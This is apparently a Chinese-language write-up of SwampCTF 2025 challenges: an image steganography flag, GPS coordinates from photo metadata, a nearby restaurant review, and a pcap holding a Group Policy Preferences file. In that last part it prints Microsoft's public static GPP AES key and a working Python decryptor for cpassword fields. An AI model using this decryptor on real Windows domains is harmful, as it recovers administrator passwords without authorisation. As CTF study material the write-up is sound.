SwampCTF 2025

比赛地址:SwampCTF 2025

比赛时间:29 Mar 2025 05:00 CST - 31 Mar 2025 05:00 CST

复现的题目用🔁标注

Misc

Pretty Picture: Double Exposure

Challenge

Pretty Picture: Double Exposure

Hidden in the bits below, an image wait’s to be shown.

double-exposure

Solution

SwampCTF2025-1

用 StegSolve 打开翻几下就看到了

1
swampCTF{m3ss4g3s_0r_c0de_c4n_b3_h1dd3n_1n_1m4g3s}

OSINT

Party Time!

Challenge

Party Time!

By: lyngo

This party house is known for its 3AM outings, but you’ve gotta work for the location if you want to come! Enter the GPS coordinates of the location!

Example: swampCTF{xx.xx.xx,xx.xx.xx}, swampCTF

附件【IMG_4048.HEIC】下载

Solution

SwampCTF2025-2

在属性这里就能看到经纬度

1
swampCTF{29.39.10,82.19.59}

Party Time! Level 2

Challenge

Party Time! Level 2

The party just ended, but people are hungry. Find the nearest fast food spot to see where everyone went!

The flag format is swampCTF{…}. You will not need to wrap it yourself.

查看提示

The reviews love the racecar fast service.

Solution

先是找到了这个地方的实际位置蓋恩斯維爾,佛羅里達 - Google 地圖

SwampCTF2025-3

然后搜索附近的快餐店

SwampCTF2025-4

于是找到了这条评论

1
swampCTF{Checkers_Yum}

Forensics

Preferential Treatment

Challenge

Preferential Treatment

We have an old Windows Server 2008 instance that we lost the password for. Can you see if you can find one in this packet capture?

gpnightmare.pcap

Solution

搜索 CTF 找到了这条流量

SwampCTF2025-5

追踪流发现这段 XML 数据

SwampCTF2025-6

1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EC16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-52E5-4d24-8B1A-D9BDE98BA1D1}" name="swampctf.com\Administrator" image="2"
          changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties action="U" newName="" fullName="" description=""
                    cpassword="dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI="
                    changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="swampctf.com\Administrator"/>
    </User>
</Groups>

经过搜索得知在 Windows Server 2008 及更早版本中,微软引入了组策略首选项(Group Policy Preferences, GPP)功能,允许管理员通过组策略来配置用户账户和密码。为了存储这些密码,微软选择使用 AES 加密算法对密码进行加密,并将加密后的结果存储为 cpassword 字段。然而微软使用了一个 静态的、硬编码的 AES 密钥 来加密所有 cpassword 字段,这个密钥是公开的,任何知道该密钥的人都可以解密 cpassword

以下是公开的 AES 密钥(以十六进制表示):

1
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

exp 如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import base64
from Crypto.Cipher import AES

AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

def decrypt_cpassword(cpassword):
    encrypted_password = base64.b64decode(cpassword)
    cipher = AES.new(AES_KEY, AES.MODE_CBC, IV=b"\x00" * 16)
    decrypted_password = cipher.decrypt(encrypted_password)
    return decrypted_password[:-decrypted_password[-1]].decode()


cpassword = "dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI="
print(decrypt_cpassword(cpassword))

运行得到 flag

1
swampCTF{4v3r463_w1nd0w5_53cur17y}